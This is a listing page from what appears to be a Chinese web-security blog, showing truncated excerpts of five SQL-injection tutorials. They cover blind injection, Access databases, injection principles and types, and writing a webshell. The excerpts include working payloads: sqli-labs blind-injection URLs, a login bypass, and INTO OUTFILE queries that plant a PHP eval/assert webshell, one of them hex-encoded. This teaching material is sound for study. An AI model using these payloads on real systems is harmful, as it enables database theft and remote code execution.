2022-01-07 盲注详解 盲注详解 {lamp/}盲注SQL注入类型布尔型盲注时间延迟型盲注报错型盲注其他报错函数DNSlog快速注入{lamp/} 一、布尔盲注“布尔盲注”又称布尔判断,指的是利用SQL语句逻辑与(and)操作,判断and两边的条件是否成立,SQL语句带入数据库查询后判断返回内容(通常返回值仅有非空和空两种状态),类似布尔型的true和false的两种状态;看具体函数使用,要求必须掌握left、substr、ascii、regexp、like函数用法;▲left(user())>’10’ user()显示当前数据库用户,length统计字符长度。示例:http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(user())>20 --+http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(user())=14 --+▲left(user(),1)>’s’ //left()函数user()显示当前数据库用户,le... admin 2022-01-07 WEB漏洞,SQL注入 2,191 阅读 2 评论 2022年01月07日 2,191 阅读 2 评论
2022-01-01 其他数据库注入 其他数据库注入 {lamp/}Access数据库注入Microsoft Office Access 是由微软发布的关系数据库管理系统。小巧而灵活,是Windows下小型C/S系统和网站B/S不错的选择。Access的用途体现在两个方面:一、用来进行数据分析: Access有强大的数据处理、统计分析能力,利用access的查询功能,可以方便地进行各类汇总、平均等统计;二、用来开发软件: Access用来开发软件,比如生产管理、销售管理、库存管理等各类企业管理软件,在开发一些小型网站WEB应用程序时,用来存储数据。例如ASP+Access判断数据库类型根据url的后缀。ASP为后缀名的是ACCESS数据库在url后面加单引号,以报错信息“Microsoft ole db provider for odbc drivers”判断为access通过and (select count(*) from msysobjects)>0发生错误页面则为access数据库。msysobjects、msysqueries\msysrelationships为access的三个系统表,web环境下没有权限... admin 2022-01-01 WEB漏洞,SQL注入 1,245 阅读 0 评论 2022年01月01日 1,245 阅读 0 评论
2021-12-24 SQL注入写webshell SQL注入写webshell 一、MySQL写shell写入WebShell的几种方式1、利用Union select 写入需要满足的条件对web目录有写权限GPC关闭(GPC:是否对单引号转义)有绝对路径(读文件可以不用,写文件需要)没有配置secure-file-priv?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'D:/WWW/evil.php' ?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile "D:/WWW/evil.php"2、利用分隔符写入?id=1 into outfile 'D:/WWW/evil.php' fie... admin 2021-12-24 WEB漏洞,SQL注入 2,329 阅读 0 评论 2021年12月24日 2,329 阅读 0 评论
2021-12-22 SQL注入漏洞原理 SQL注入漏洞原理 SQL注入基本概念当攻击者在可控输入点输入恶意的SQL语句,后端Web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,直接输入数据库引擎执行,攻击者可实现获取或修改数据库中的数据。SQL注入本质后端处理程序,不加思索把用户输入的数据当做代码来执行,违背了“数据与代码分离”的原则。主要还是后端开发人员没有安全意识,没有做好过滤和防护措施。SQL注入原理详解比如一个登录接口的语句:$user = $_POST["user"]; $passwd = $_POST["pass"]; $sql=" SELECT * FROM user WHERE username = '$user' AND password = '$passwd' "'user'、'passwd'是从前端传入的参数。当我们传入恶意的user、passwd参数,如 $user=' or 1=1 #。此时拼接的sql语句为:$sql=" SELECT * FROM user WHERE username = '... admin 2021-12-22 WEB漏洞,SQL注入 3,256 阅读 0 评论 2021年12月22日 3,256 阅读 0 评论
2021-12-21 SQL注入分类 SQL注入分类 SQL注入分类1.基于参数注入类型联合注入数字型注入字符型注入2.基于提交方式注入类型GET提交注入类型POST提交注入类型COOKIE提交注入类型UA提交注入类型Referer提交注入类型3.盲注SQL注入类型布尔型盲注时间延迟型盲注报错型盲注其他报错函数DNSlog快速注入4.基于查询方式注入类型select语句引起注入insert语句引起注入update语句引起注入delete语句引起注入5.其他SQL注入类型二次编码注入堆叠注入宽字节注入二次注入JSON注入1、基于参数注入类型联合注入联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。版本是5.0以上的MYSQL数据库是因为MYSQL会有一个系统数据库information_schema,能很快的通过几条注入语句获取到想要的数据。联合注入的条件:1、界面能够回显数据库查询到的数据;2、界面回显内容至少能够显示数据库中的某列数据; 注意:SQL注入针对的是市面所有数据库存在的漏洞,而不是仅针对MySQL数据库,仅因为MyS... admin 2021-12-21 WEB漏洞,SQL注入 4,213 阅读 0 评论 2021年12月21日 4,213 阅读 0 评论